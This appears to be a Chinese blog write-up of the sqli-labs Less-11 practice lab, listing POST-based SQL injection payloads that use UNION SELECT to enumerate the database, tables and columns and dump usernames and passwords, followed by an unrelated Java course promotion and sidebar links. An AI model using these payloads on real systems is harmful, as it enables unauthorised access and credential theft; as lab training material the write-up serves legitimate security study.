当前位置:网站首页>sqli-labs(less-11)
sqli-labs(less-11)
2022-08-02 10:50:00 【m0_67401499】
目录
less-11(POST注入)
1.send to Repeater

2.单引号报错

3. 查库名
aadmin’union select user(),database()–

4.查表名
aadmin’union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’–

5.查段名
aadmin’union select 1,group_concat(column_name) from information_schema.columns where table_table=‘users’–

6.查数据
aadmin’union select 1,group_concat(username,‘:’,password) from users –

7.用查到的数据Dumb登录

先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦
边栏推荐
- Alibaba CTO Cheng Li: Alibaba Open Source History, Concept and Practice
- 流动性质押挖矿系统开发如何制作?单双币系统开发成熟技术
- Com多进程通信实现
- ASP.NET Core 6框架揭秘实例演示[31]:路由"高阶"用法
- 记一次mysql查询慢的优化历程
- Hello, my new name is "Bronze Lock/Tongsuo"
- 从零开始Blazor Server(5)--权限验证
- 多大数量级会出现哈希碰撞
- [Science of Terminology] For those difficult words about the integrated workbench, read this article to understand in seconds!
- 为什么要使用BGP?
猜你喜欢

Outsourced Student Management System Architecture Documentation

2022年8月初济南某外包公司全栈开发面试题整理

After 21 years of graduation, I switched to software testing. From 0 income to a monthly salary of over 10,000, I am really lucky...

LeetCode每日一练 —— 225. 用队列实现栈

周杰伦新歌发布,爬取《Mojito》MV弹幕,看看粉丝们都说的些啥!

Com多进程通信实现

C#/VB.NET to add more lines more columns image watermark into the Word document

X86函数调用模型分析

How to choose a truly "easy-to-use, high-performance" remote control software

通过方法引用获取方法名
随机推荐
学习笔记-支付宝支付
如何选择一块真正“好用的、性能高”的远程控制软件
牛客刷题——剑指offer(第三期)
多线程之生产者与消费者
情景剧《重走长征路》上演
MSYS2 QtCreator Clangd code analysis can not find mm_malloc.h problem remedy
R language ggplot2 visualization: use the ggbarplot function of the ggpubr package to visualize the stacked bar plot, the lab.pos parameter specifies the position of the numerical label of the bar cha
保姆级教程:写出自己的移动应用和小程序(篇二)
爆款视频怎么做?这里或许有答案!
Oracle根据时间查询
365天挑战LeetCode1000题——Day 047 设计循环队列 循环队列
一体化在线政务服务平台,小程序容器技术加速建设步伐
行为型模式-模板方法模式
LayaBox---TypeScript---Three slash instructions
全方位剖析Numpy中的np.diag源代码
多大数量级会出现哈希碰撞
X86函数调用模型分析
Com多进程通信实现
win10打印服务无法启动(运行时错误automation)
[Science of Terminology] For those difficult words about the integrated workbench, read this article to understand in seconds!